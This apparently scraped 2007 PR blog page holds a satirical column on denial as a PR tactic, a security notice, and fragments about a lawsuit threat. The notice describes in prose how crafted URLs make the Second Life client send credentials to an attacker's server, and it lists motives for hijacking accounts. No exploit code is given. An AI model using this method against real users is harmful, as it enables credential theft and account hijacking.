Posted by Bruce Pilgrim Tuesday, September 18, 2007
Talking to My Cats: 9-18-07
Recently, some of the inestimable wit and wisdom of Baghdad Bob was highlighted in this space. For the next several weeks, I'll be digging deeper into some of Bob's best practices for the PR industry.
"Denial," Bob said, "is your friend. Americans are unbelievably gullible and they distrust the media. Denial buys you time to come up with a better idea – or implement your exit strategy and get the hell out of Dodge."
One advantage of denial is you can temporarily deflect attention from reality. The faithful will believe you, for awhile. They'll believe almost anything, especially if you throw a big enough scare into them. Declare war on terror, or blame the Jews, or tell them reducing greenhouse gases will hurt the economy. Tell them that whatever happened didn't really happen. Or that it happened a lot differently than they’ve been led to believe.
Denial is certainly the first strategy most perps turn to when they're thrust into the spotlight. It's also one of the five stages of coping with death or tragedy. Even though denial almost never works, we keep trying it. Even though fessing up to the truth is always the better way to go. You admit your mistake, and move on. If you choose to cruise down denial, you'll inevitably be caught out, adding additional charges to the original offense.
Even when we’re guilty of nothing, we still automatically play the denial card. When I was nine years old, playing catch with my dad in the backyard, a gust of wind slammed the back door shut suddenly, shattering the window glass. My dad looked at me and I immediately cried out: "I didn't do it. The wind did it." He laughed so hard he had to sit down.
Why did this seemingly instinctive, yet ludicrous, impulse to deny responsibility become the norm? Should we blame Dr. Benjamin Spock for cajoling parents to pamper all those baby boomers? This incredibly spoiled generation has, in turn, shielded, positively-reinforced, and empowered their own issue to the point that, in two or three generations, sociopaths will be labeled as "unconventionally-abled."
A serious client-side vulnerability, affecting the accounts of Second life residents, has been discovered by the GNUCITIZEN Group. The malicious attack allows hackers to steal users' login credentials and hijack their profiles. With a simple one-line exploit code, ANY USER PASSWORD CAN BE COMPROMISED. Second Life residents should treat this vulnerability as HIGH RISK and suspend online activities until further notice.
The vulnerability was discovered within the Internet Explorer URL protocol handler. Specially crafted URLs can be used to launch the Second Life client and pass arbitrary command line options. One of the command line flags, described in the exploit, instructs the client to auto login. Another command line parameter instructs the client to connect and send the login details to arbitrary HTTP server over XML-RPC. Upon execution, the exploit will launch the client which will subsequently send the user credentials to a malicious server. This server will collect the data and reset the password to one known by the attacker, therefore, hijacking the victim's account.
1. Conduct Industrial Espionage - Many corporate initiatives in the real world debut in Second life. This practice allows companies to test various programs at a very early stage and before any real world expenditures are made. Hijacking SL identities gives attackers the opportunity to preview the competitor’s long-term market strategy before it is launched in the real world.
2. Cause Financial Damage - Credentials stolen by the attacker are bound to a bank account in Linden dollars. Stealing the financial assets could bring the virtual collapse of many small enterprises.
3. Implement Black PR - As with any society, Second Life has its very own opinion shapers and leaders. This online vulnerability allows attackers to hijack key profiles to influence public opinion. Conversely, attackers can put their rivals in many unpleasant situations by faking irrational decisions, initiating conflict situation, giving false and confusing information or simply blocking access to the system. Bottom line: the attacker will use this vulnerability to try to defame the target in front of its current and prospective stakeholders.
According to Petko D. Petkov, founder and leading contributor of GNUCITIZEN group: "Most attackers don’t event have to convert the hash back to a password string. Attackers can login with the hash itself by forging a request to one of the Second Life authentication servers. The unhashed password is only needed in situations where the attacker wants to explore other on-line service the victim is currently registered with."
GNUCITIZEN group is an Information Technology security think-tank. Some of their latest research projects include the latest 0day Apple QuickTime remote code execution vulnerability, in depth analysis of Web2.0 security issues and a database of the latest client-side cross-site scripting attack vectors. The GNUCITIZEN group members have participated in numerous tiger-team session for some of the biggest financial institutions in United Kingdom and abroad.
On Thursday, March 8, 2007 at 7:41 AM, Ronn Torossian, President and CEO of 5WPR, emphatically promised that he was going to sue us. No real reason, he was just irritated by our teasing him about getting in bed with pornographer Joe Francis. Anyway, Ronn gave his obscenity-laced word that we'd see the complaint in 72 hours. It's now late by
Kathleen Durazo about A Measly $2.8 Million Goes Missing, Lawsuit Results Fri, Jul 31, 10:58:34 AM Ray Durazo (the founder) sold the company to Dan in 1999. He was not involved in any of this. He (and I) found out about the lawsuit in the LA Times. In addition to embezzling this m [...]